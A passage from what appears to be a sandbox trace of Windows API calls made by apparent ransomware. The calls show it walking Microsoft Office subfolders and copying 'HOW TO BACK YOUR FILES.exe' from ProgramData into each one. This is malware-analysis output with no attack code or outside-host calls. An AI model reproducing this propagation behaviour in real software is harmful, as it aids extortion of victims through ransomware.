lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.239] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.239] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba9ab90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d298ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d298ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.239] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.240] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.246] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM" [0073.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0073.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0073.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM") returned 56 [0073.246] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM" [0073.246] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.246] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.251] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.251] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba28770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d298ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d298ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.251] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.251] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.254] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5" [0073.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0073.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0073.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5") returned 60 [0073.254] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5" [0073.254] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.254] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.259] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.259] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd3f79f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d2bec40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.259] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.259] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.260] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles" [0073.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335108 | out: hHeap=0x2b0000) returned 1 [0073.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0073.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles") returned 72 [0073.260] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles" [0073.260] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.260] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.302] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.302] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd3f79f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d331060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d331060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.302] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.302] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.304] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl" [0073.304] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7af0 | out: hHeap=0x2b0000) returned 1 [0073.304] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0073.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl") returned 78 [0073.304] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl" [0073.304] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.305] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\swirl\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.310] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.310] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd54e650, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d331060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d331060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.310] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.310] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.310] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2" [0073.310] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7a48 | out: hHeap=0x2b0000) returned 1 [0073.310] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0073.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2") returned 77 [0073.310] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2" [0073.311] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.311] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\sts2\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.316] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.316] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd54e650, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d331060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d331060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.316] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.316] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.317] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen" [0073.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8878 | out: hHeap=0x2b0000) returned 1 [0073.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0073.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen") returned 84 [0073.317] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen" [0073.317] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.317] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\springgreen\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.321] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.321] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd54e650, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d3571c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d3571c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.321] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.321] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.322] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions" [0073.322] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e3000 | out: hHeap=0x2b0000) returned 1 [0073.322] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0073.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions") returned 82 [0073.322] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions" [0073.322] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.322] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.327] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.327] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd67f150, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d3571c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d3571c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.327] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.327] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.328] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue" [0073.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2f50 | out: hHeap=0x2b0000) returned 1 [0073.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0073.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue") returned 81 [0073.328] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue" [0073.328] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.328] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\softblue\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.333] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.333] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd54e650, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d37d320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d37d320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.333] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.333] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.333] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate" [0073.333] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d79a0 | out: hHeap=0x2b0000) returned 1 [0073.333] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0073.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate") returned 78 [0073.333] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate" [0073.333] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.333] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\slate\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.337] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.337] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd54e650, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d37d320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d37d320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.337] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.337] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.337] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis" [0073.337] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d78f8 | out: hHeap=0x2b0000) returned 1 [0073.337] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0073.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis") returned 78 [0073.337] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis" [0073.337] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.338] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\oasis\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.342] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.342] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd5284f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d37d320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d37d320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.342] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.342] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.342] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime" [0073.342] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7850 | out: hHeap=0x2b0000) returned 1 [0073.342] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0073.342] lstrlenW (lpString="C:\\Program Files\\Microsoft 